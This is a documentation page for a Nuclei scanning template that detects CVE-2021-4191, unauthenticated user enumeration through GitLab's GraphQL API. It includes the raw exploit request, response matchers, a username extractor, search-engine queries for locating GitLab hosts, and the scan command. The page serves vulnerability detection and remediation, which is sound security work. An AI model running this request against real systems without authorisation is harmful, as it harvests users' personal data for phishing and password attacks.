GitLab GraphQL API User Enumeration
ID: CVE-2021-4191
Severity: medium
Author: zsusac
Tags: cve2021,cve,gitlab,api,graphql,enum,unauth
Description
Section titled “Description”An unauthenticated remote attacker can leverage this vulnerability to collect registered GitLab usernames, names, and email addresses.
YAML Source
Section titled “YAML Source”id: CVE-2021-4191
info: name: GitLab GraphQL API User Enumeration author: zsusac severity: medium description: An unauthenticated remote attacker can leverage this vulnerability to collect registered GitLab usernames, names, and email addresses. impact: | An attacker can enumerate valid usernames, which can be used for further attacks such as brute-forcing passwords or launching targeted phishing campaigns. remediation: | Implement rate limiting or CAPTCHA on the GraphQL API to prevent user enumeration. reference: - https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/ - https://thehackernews.com/2022/03/new-security-vulnerability-affects.html - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-4191 - https://gitlab.com/gitlab-org/gitlab/-/issues/343898 - https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-4191.json classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-4191 cwe-id: CWE-287 epss-score: 0.24657 epss-percentile: 0.96207 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 vendor: gitlab product: gitlab shodan-query: - cpe:"cpe:2.3:a:gitlab:gitlab" - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" tags: cve2021,cve,gitlab,api,graphql,enum,unauth
http: - raw: - | POST /api/graphql HTTP/1.1 Host: {{Hostname}} Content-Type: application/json Accept: */* Origin: {{RootURL}} Referer: {{RootURL}}/-/graphql-explorer
{"query":"# Welcome to GraphiQL\n#\n# GraphiQL is an in-browser tool for writing, validating, and\n# testing GraphQL queries.\n#\n# Type queries into this side of the screen, and you will see intelligent\n# typeaheads aware of the current GraphQL type schema and live syntax and\n# validation errors highlighted within the text.\n#\n# GraphQL queries typically start with a \"{\" character. Lines that starts\n# with a # are ignored.\n#\n# An example GraphQL query might look like:\n#\n# {\n# field(arg: \"value\") {\n# subField\n# }\n# }\n#\n# Keyboard shortcuts:\n#\n# Prettify Query: Shift-Ctrl-P (or press the prettify button above)\n#\n# Run Query: Ctrl-Enter (or press the play button above)\n#\n# Auto Complete: Ctrl-Space (or just start typing)\n#\n\n{\n users {\n nodes {\n id\n name\n username\n }\n }\n}","variables":null,"operationName":null}
matchers-condition: and matchers: - type: word part: body words: - '"data"' - '"users"' - '"nodes"' - '"id"' - 'gid://' condition: and
- type: status status: - 200
extractors: - type: json json: - '.data.users.nodes[].username'# digest: 4b0a00483046022100fa86c5f32fbeab69b62bc7e9dfdc020c46ddf48c28c379d494c60e611501a831022100a6264296ef88c432517c86335a65e762f329e12ae38ed20f0121a39b73883aaf:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-4191.yaml"